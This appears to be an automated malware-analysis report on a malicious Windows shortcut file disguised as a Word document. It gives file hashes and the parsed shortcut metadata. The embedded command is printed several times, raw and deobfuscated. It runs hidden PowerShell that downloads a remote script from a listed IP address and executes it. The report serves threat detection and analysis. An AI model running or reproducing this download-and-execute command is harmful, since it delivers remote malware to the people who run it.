|
Hash | Hash Value |
|---|---|
| MD5 | 82c707d666db67563d0f6c67debed2e7
|
| Sha1 | 080ecaadbc9058de1a8973269e8aad80f6883853
|
| Sha256 | eb46d821036ea78ca466751a723f0f131b52bacdb9ec07f28d7e70cdda291be7
|
| Sha384 | ec10b77e1f1f51e423e78006579345bac05d343b1f574a95a42d4028445fd56f9b0232ee52e451a196653dbd51eb36cb
|
| Sha512 | 22866d21af0f0ef502286c2269dd5de91377d831458365e15f2d6d0b43e251e0491affdb8b47f47df65710dcf77e5595f7c241fa4cd252f34d73e61a940f8416
|
| SSDeep | 12:8d/Ss0o9uqVU89YU4S9o6Lqs8XgL48niYKX/i+IJNBXf8XQLyD+ssMh/4xj3UFcL:8d/PbvdfueiXvlIJNBP4DnPCfHzWWH
|
| TLSH | B9F12B1023F59704F4B2CF7AE97673A0EA72B949DE25E78D0215B00D6C30624E565F1B
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -w Hidden $w = New-Object Net.WebClient; $w.Headers.Add('User-Agent', 'UA WindowsPowerShell'); . ([ScriptBlock]::Create($w.DownloadString('http://193.238.152.123/Dossto4ka/smellborrow.ps1'))) |
| Deobfuscated PowerShell | -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://193.238.152.123/Dossto4ka/smellborrow.ps1"))) |
| Deobfuscated PowerShell | shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "1/29/2026" "3:08:24" "PM" accesstime: "1/29/2026" "3:08:24" "PM" writetime: "1/29/2026" "3:08:24" "PM" filesize: 0 0 iconindex: 97 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "MS" "W??rd" "Docum??nt" workingdir: "%APPDATA%" commandlinearguments: -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://193.238.152.123/Dossto4ka/smellborrow.ps1"))) iconlocation: "imageres.dll" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -w Hidden $w = New-Object Net.WebClient; $w.Headers.Add('User-Agent', 'UA WindowsPowerShell'); . ([ScriptBlock]::Create($w.DownloadString('http://193.238.152.123/Dossto4ka/smellborrow.ps1'))) Malicious |
82c707d666db67563d0f6c67debed2e7 |
| Deobfuscated PowerShell | -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://193.238.152.123/Dossto4ka/smellborrow.ps1"))) Malicious |
82c707d666db67563d0f6c67debed2e7 > LNK CommandLine |
| Deobfuscated PowerShell | shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "1/29/2026" "3:08:24" "PM" accesstime: "1/29/2026" "3:08:24" "PM" writetime: "1/29/2026" "3:08:24" "PM" filesize: 0 0 iconindex: 97 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "MS" "W??rd" "Docum??nt" workingdir: "%APPDATA%" commandlinearguments: -w "Hidden" $w "=" "New-Object" "Net.WebClient" $w."Headers"."Add"("User-Agent", "UA WindowsPowerShell") . ([ScriptBlock]::"Create"($w."DownloadString"("http://193.238.152.123/Dossto4ka/smellborrow.ps1"))) iconlocation: "imageres.dll" Malicious |
82c707d666db67563d0f6c67debed2e7 > [Lnk Summary] |